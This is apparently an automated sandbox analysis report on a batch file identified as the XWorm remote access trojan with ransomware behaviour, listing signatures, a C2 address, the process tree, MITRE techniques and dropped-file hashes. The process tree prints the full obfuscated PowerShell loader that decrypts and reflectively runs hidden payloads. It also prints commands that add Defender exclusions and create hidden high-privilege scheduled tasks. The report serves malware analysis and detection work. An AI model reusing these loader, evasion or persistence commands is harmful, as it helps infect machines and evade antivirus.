Overview

overview

10

Static

static

1

coin.b.bat

windows7-x64

8

coin.b.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-05-2024 14:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    coin.b.bat

  • Size

    91KB

  • MD5

    520c1190bbbe3a7359a6e72f76618245

  • SHA1

    50d5e441a97aad127e8d5ad8c28c848b3be02c5d

  • SHA256

    91813779ab003d08ee337226c9ba845aaca64098e9740e6aaf30a0c8fa833ee0

  • SHA512

    98ebc8ee9b1b1d7302a5771f1e6b174903a9c249459a98e57e8cd48ce8760997b414246c7c9f05d1ce08fa299dcc2496c389b4126af647e8f2a6e9f81d15f749

  • SSDEEP

    1536:HtkPhsAgh2YhIXwWIN0hdI7E5WQTpJlqb3mE81vT1dkYHcga3kplWaEDN4nVoLuR:NeCAgX+vIuEE5PlJAb3mE81L1dkhX3mV

Score
10/10
xwormexecutionpersistenceransomwarerattrojan

Malware Config

Extracted

Family

xworm

C2

continue-silk.gl.at.ply.gg:58347

127.0.0.1:58347
Attributes
  • Install_directory

    %Temp%

  • install_file

    steamwebhelper.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 47 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 43 IoCs
  • Suspicious use of SendNotifyMessage 40 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\coin.b.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:212
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c8KZIt7om0GReP7FMEfz0SGLs2AMU+4GQioHMorebJA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aiKe9c65ZjFACO2EycWX2w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $MEUKW=New-Object System.IO.MemoryStream(,$param_var); $piWSe=New-Object System.IO.MemoryStream; $AfYrg=New-Object System.IO.Compression.GZipStream($MEUKW, [IO.Compression.CompressionMode]::Decompress); $AfYrg.CopyTo($piWSe); $AfYrg.Dispose(); $MEUKW.Dispose(); $piWSe.Dispose(); $piWSe.ToArray();}function execute_function($param_var,$param2_var){ $eWsMy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mbrUF=$eWsMy.EntryPoint; $mbrUF.Invoke($null, $param2_var);}$OUKqL = 'C:\Users\Admin\AppData\Local\Temp\coin.b.bat';$host.UI.RawUI.WindowTitle = $OUKqL;$FwHhv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($OUKqL).Split([Environment]::NewLine);foreach ($oOibP in $FwHhv) { if ($oOibP.StartsWith(':: ')) { $aqXWs=$oOibP.Substring(3); break; }}$payloads_var=[string[]]$aqXWs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2240
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_164_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_164.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4808
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_164.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4436
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_164.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1356
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c8KZIt7om0GReP7FMEfz0SGLs2AMU+4GQioHMorebJA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aiKe9c65ZjFACO2EycWX2w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $MEUKW=New-Object System.IO.MemoryStream(,$param_var); $piWSe=New-Object System.IO.MemoryStream; $AfYrg=New-Object System.IO.Compression.GZipStream($MEUKW, [IO.Compression.CompressionMode]::Decompress); $AfYrg.CopyTo($piWSe); $AfYrg.Dispose(); $MEUKW.Dispose(); $piWSe.Dispose(); $piWSe.ToArray();}function execute_function($param_var,$param2_var){ $eWsMy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mbrUF=$eWsMy.EntryPoint; $mbrUF.Invoke($null, $param2_var);}$OUKqL = 'C:\Users\Admin\AppData\Roaming\startup_str_164.bat';$host.UI.RawUI.WindowTitle = $OUKqL;$FwHhv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($OUKqL).Split([Environment]::NewLine);foreach ($oOibP in $FwHhv) { if ($oOibP.StartsWith(':: ')) { $aqXWs=$oOibP.Substring(3); break; }}$payloads_var=[string[]]$aqXWs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Sets desktop wallpaper using registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1156
            • C:\Users\Admin\AppData\Local\Temp\seroxen.lib.exe
              "C:\Users\Admin\AppData\Local\Temp\seroxen.lib.exe"
              6⤵
              • Executes dropped EXE
              PID:5064
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3696
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4328
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\steamwebhelper.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4480
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'steamwebhelper.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1728
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "steamwebhelper" /tr "C:\Users\Admin\AppData\Local\Temp\steamwebhelper.exe"
              6⤵
              • Creates scheduled task(s)
              PID:1724
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
              6⤵
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1868
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed3d246f8,0x7ffed3d24708,0x7ffed3d24718
                7⤵
                  PID:2252
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2
                  7⤵
                    PID:772
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
                    7⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4600
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
                    7⤵
                      PID:2580
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
                      7⤵
                        PID:1692
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
                        7⤵
                          PID:3036
                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 /prefetch:8
                          7⤵
                            PID:3020
                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 /prefetch:8
                            7⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2060
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1
                            7⤵
                              PID:4088
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
                              7⤵
                                PID:4184
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
                                7⤵
                                  PID:1804
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,4659099455561363196,12351886982144823773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
                                  7⤵
                                    PID:1692
                                • C:\Windows\SYSTEM32\CMD.EXE
                                  "CMD.EXE"
                                  6⤵
                                    PID:5504
                        • C:\Users\Admin\AppData\Local\Temp\steamwebhelper.exe
                          C:\Users\Admin\AppData\Local\Temp\steamwebhelper.exe
                          1⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4392
                        • C:\Windows\System32\CompPkgSrv.exe
                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                          1⤵
                            PID:4844
                          • C:\Windows\System32\CompPkgSrv.exe
                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                            1⤵
                              PID:2568

                            Network

                            MITRE ATT&CK Matrix ATT&CK v13

                            Initial Access

                            Execution

                            Command and Scripting Interpreter

                            1
                            T1059

                            PowerShell

                            1
                            T1059.001

                            Scheduled Task/Job

                            1
                            T1053

                            Persistence

                            Boot or Logon Autostart Execution

                            1
                            T1547

                            Registry Run Keys / Startup Folder

                            1
                            T1547.001

                            Scheduled Task/Job

                            1
                            T1053

                            Privilege Escalation

                            Boot or Logon Autostart Execution

                            1
                            T1547

                            Registry Run Keys / Startup Folder

                            1
                            T1547.001

                            Scheduled Task/Job

                            1
                            T1053

                            Defense Evasion

                            Modify Registry

                            2
                            T1112

                            Credential Access

                            Discovery

                            Query Registry

                            3
                            T1012

                            System Information Discovery

                            3
                            T1082

                            Lateral Movement

                            Collection

                            Exfiltration

                            Command and Control

                            Impact

                            Defacement

                            1
                            T1491

                            Resource Development

                            Reconnaissance

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                              Filesize

                              3KB

                              MD5

                              661739d384d9dfd807a089721202900b

                              SHA1

                              5b2c5d6a7122b4ce849dc98e79a7713038feac55

                              SHA256

                              70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

                              SHA512

                              81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

                              Download Submit
                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                              Filesize

                              152B

                              MD5

                              439b5e04ca18c7fb02cf406e6eb24167

                              SHA1

                              e0c5bb6216903934726e3570b7d63295b9d28987

                              SHA256

                              247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654

                              SHA512

                              d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2

                              Download Submit
                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                              Filesize

                              152B

                              MD5

                              a8e767fd33edd97d306efb6905f93252

                              SHA1

                              a6f80ace2b57599f64b0ae3c7381f34e9456f9d3

                              SHA256

                              c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb

                              SHA512

                              07b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241

                              Download Submit
                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                              Filesize

                              5KB

                              MD5

                              849978e4c0325ec6e7d4c6a0a895f6df

                              SHA1

                              b1adb09a56dc68f61f5c944ee0b573eca47367a7

                              SHA256

                              4b060af277ba04ceb630615a9656ef81f32c10dce6c923e248088b42eea2c1b9

                              SHA512

                              369aed9fb47a3a3e6915183100a8557f61fc5bd21c0629bea37bba4b856eec99276b0cadeefb4735d1845d5240f49c69e75e0b204455c09fd603d5fa71865b27

                              Download Submit
                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                              Filesize

                              6KB

                              MD5

                              62ad9f96a2e85ba032774f000afcbcd5

                              SHA1

                              d19bdb0fce7d127579f64f164908fb93eaf7c200

                              SHA256

                              9fbba29cd86ec418c4cc98e4576300f4d679f534f33fd078de56b9ff5243eefc

                              SHA512

                              45404b716077f7b75b4b2e4f5b8852b5e96a94de1ce850aab703a1bbaae0a32c4567dee5db9b397754f18d26659caf76c1a7776ce9de460aac8a10b9ef22c94d

                              Download Submit
                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                              Filesize

                              6KB

                              MD5

                              5542cf28963c74a53ed2551e0f4c525c

                              SHA1

                              b710e5ecf0da306c1916c6a5a2923c2f84c76350

                              SHA256

                              e86aeb7880f2f9c6704ab458b94389f7621f97abaf5ae75501604b7100723e5e

                              SHA512

                              00c08963546f2aad6419c690fe48978a60d7bf314b8bdd250c5c664aaf36d82b286a698232fb599f4de7382a6ac9f1dafce119cae44b7bc86e165f05ec4f9620

                              Download Submit
                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                              Filesize

                              16B

                              MD5

                              6752a1d65b201c13b62ea44016eb221f

                              SHA1

                              58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                              SHA256

                              0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                              SHA512

                              9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                              Download Submit
                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                              Filesize

                              11KB

                              MD5

                              50f0c807fcdf3619137ba4a584edf548

                              SHA1

                              87e8fbd7d5d2aeb9572ddcc01c4a38373b0e95f5

                              SHA256

                              96b4a11889ad0816b8e196cdfeb1e19a8df5846b9fb3286fab8df5cc938539ce

                              SHA512

                              29bf643d94c3504bfa59ed5398e6c870e7e0ded23e359090d5cf22c51a74bda7cffb91cb23d1ce9052505e8e80a5900b337c7faeb74d30c2a8bb0ae20584a95f

                              Download Submit
                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                              Filesize

                              11KB

                              MD5

                              e313496412fefbd487e8da7d93f5be78

                              SHA1

                              65ceb6947748440103f4345584a85765b095ac9e

                              SHA256

                              8421c3e986569aee19a0a9acb262b02a2d5d4da316529a8088f7285eadb4a4c8

                              SHA512

                              bcc7fac9b4e5a4402bd55ca4f6a2e53422c830d3134095c19158a802ac4cc79645286eeb2f54c9b94bceb07a2c1b5f15149c5d4a41808ad4358a7b29638bcd17

                              Download Submit
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              944B

                              MD5

                              d0a40a2d16d62c60994d5bb5624a589b

                              SHA1

                              30f0a77f10518a09d83e6185d6c4cde23e4de8af

                              SHA256

                              c213a4024e89a0240d0b1fa3b18ea3db3db7bbe7ca1bdeed86dce9c2c4991ef8

                              SHA512

                              cecef5087f194a83948880e36445324406218f6877386d6db7850b8f97ac107e042ea9445bb7e73c6e6a2c7da9782b7dae8caba0a1c997677d096b3271a4cac0

                              Download Submit
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              1KB

                              MD5

                              d771de020a08527e71e3f36b2e8cd62a

                              SHA1

                              3023a9387de2502170d66773d4eb7f23fb155633

                              SHA256

                              65280b191b81b71435edfaea9625a1db4600b1c49140aae5def659cc73b20d80

                              SHA512

                              1d585a15797f5d6fe0a715431ae9733e3d382d75e5c372f9d212f0e2955ca6f0e27dc70093c51890982db1d3f2a19fa2f7089c2eade77b08403eb83966b920a3

                              Download Submit
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              944B

                              MD5

                              d28a889fd956d5cb3accfbaf1143eb6f

                              SHA1

                              157ba54b365341f8ff06707d996b3635da8446f7

                              SHA256

                              21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                              SHA512

                              0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                              Download Submit
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              944B

                              MD5

                              c1b0a9f26c3e1786191e94e419f1fbf9

                              SHA1

                              7f3492f4ec2d93e164f43fe2606b53edcffd8926

                              SHA256

                              796649641966f606d7217bb94c5c0a6194eef518815dacc86feacdd78d3c1113

                              SHA512

                              fa0290d77372c26a2f14cb9b0002c222bc757ce7ad02516b884c59a1108f42eb4c76884f9edb6c7149f7c3fac917eda99b72a3b1d72b7e118a1d5a73cadd15a8

                              Download Submit
                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pfi1atfd.yca.ps1
                              Filesize

                              60B

                              MD5

                              d17fe0a3f47be24a6453e9ef58c94641

                              SHA1

                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                              SHA256

                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                              SHA512

                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                              Download Submit
                            • C:\Users\Admin\AppData\Local\Temp\seroxen.lib.exe
                              Filesize

                              10KB

                              MD5

                              57a21007e4a8f423332f8e19b24081cd

                              SHA1

                              affc966362ddba697047e31e46b57c5da07a8135

                              SHA256

                              30db07f044a1f35c28ddbd111b1bf457db53555e464b2d60704c9e8023801c95

                              SHA512

                              e66dd63bb78e36f2c6d4dab62d0dd653d74eda19bcd834f358386dcef1cd60413fc4943be5766b547986ab4f28ea9b18e9e829008cdd00aa51afd5b4d6ac533b

                              Download Submit
                            • C:\Users\Admin\AppData\Local\Temp\steamwebhelper.exe
                              Filesize

                              442KB

                              MD5

                              04029e121a0cfa5991749937dd22a1d9

                              SHA1

                              f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                              SHA256

                              9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                              SHA512

                              6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                              Download Submit
                            • C:\Users\Admin\AppData\Roaming\startup_str_164.bat
                              Filesize

                              91KB

                              MD5

                              520c1190bbbe3a7359a6e72f76618245

                              SHA1

                              50d5e441a97aad127e8d5ad8c28c848b3be02c5d

                              SHA256

                              91813779ab003d08ee337226c9ba845aaca64098e9740e6aaf30a0c8fa833ee0

                              SHA512

                              98ebc8ee9b1b1d7302a5771f1e6b174903a9c249459a98e57e8cd48ce8760997b414246c7c9f05d1ce08fa299dcc2496c389b4126af647e8f2a6e9f81d15f749

                              Download Submit
                            • C:\Users\Admin\AppData\Roaming\startup_str_164.vbs
                              Filesize

                              115B

                              MD5

                              d205a237870aa23dc12fc98f1f45d49a

                              SHA1

                              292da3b980b6505376cba759b2253c8f1cefc7c6

                              SHA256

                              1d9e9b82693d1be7c72ccaace065b82ed70debd5ca63624bec87f61480822334

                              SHA512

                              7e613b45174f6d5ff7f7332b39d3a95c1874aecd8bfe603625c5852c8ac4d992330f2f38cfc03e01250226c647f841ba66529e57aa9d52a2882f4311c8ff8b80

                              Download Submit
                            • C:\Users\Admin\Desktop\How To Decrypt My Files.html
                              Filesize

                              632B

                              MD5

                              5b8c1f3e4a0e50e44dca4d16c3a09b8c

                              SHA1

                              ddd88605d5f3ad24ca878fb27b011fabebff741b

                              SHA256

                              db3ff1d4c3855db878d1217051ec64d096c38d4b067587345e5b06f6c0c9f5f7

                              SHA512

                              9eb4b1bf8481e8f4b1c31b5f161de563806d29ca05285a35b5d2cb7cf555d516bf23b060ecaa9ecd1dc7653f2ab5164ed1e6e8e8fef5d29d7189a2233736f1bf

                              Download Submit
                            • C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC
                              Filesize

                              16B

                              MD5

                              06469a74c28d1b5f39999a3a54eb356a

                              SHA1

